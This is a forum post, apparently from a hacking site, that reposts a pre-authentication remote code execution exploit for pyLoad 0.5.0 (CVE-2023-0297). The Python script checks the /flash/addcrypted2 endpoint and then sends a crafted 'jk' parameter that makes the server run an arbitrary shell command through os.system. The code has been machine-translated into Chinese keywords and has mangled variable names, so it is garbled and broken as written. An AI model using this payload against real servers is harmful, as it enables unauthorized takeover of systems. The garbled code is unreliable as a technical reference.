H

PYLOAD 0.5.0-预授权远程代码执行(RCE)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#exploit title: pyload 0.5.0 -Pre -auth远程代码执行(RCE)
#日期: 06-10-2023
#credits: bau @bauh0lz
#利用作者: Gabriel Lima(0xgabe)
#供应商HomePage: https://pyload.net/
#软件link: https://github.com/pyload/pyload
#版本: 0.5.0
#测试在: Ubuntu 20.04.6
#CVE: CVE-2023-0297
导入请求,ArgParse
Parser=argparse.argumentparser()
parser.add_argument(' - u',action='store',dest='url',必需=true,help,help='target url。')
parser.add_argument(' - c',action='store',dest='cmd',必需=true,help,help='命令执行。')
参数=parser.parse_args()
Def Dorequest(URL):
TRY:
res=requests.get(url +'/flash/addcrypted2')
如果res.status_code==200:
返回true
其他:
返回false
除了requests.exceptions.requestexception为e:
打印('[!]也许主机是脱机:',e)
出口()
DEF RUNEXPLOIT(URL,CMD):
端点=url +'/flash/addcrypted2'
如果在CMD:中
palterCommand=cmd.replace('','%20')
其他:
paltercommand=cmd
有pareload='jk=pyimport%20OS; os.System('+valterCommand+''); f=function%20f2(){}; package=xxxcrypted=aaaa passwords=aaaa''
test=requests.post(endpoint,headers={'content-type':'应用程序/x-www-form-urlencoded'},data=有效载荷)
打印('[+]漏洞利用已在目标机器中执行。')
def main(targeturl,命令):
打印('[ +]检查目标主机是否活着:' + targeturl)
活着=dorequest(targeturl)
如果活着==true:
打印('[+]主机,让我们利用!')
runexploit(targeturl,命令)
其他:
打印('[ - ]主持人!')
如果(gragments.url!=none and gragments.cmd!=none):
targeturl=grainmunts.url
命令=garmuments.cmd
主(targeturl,命令)
 
后退
顶部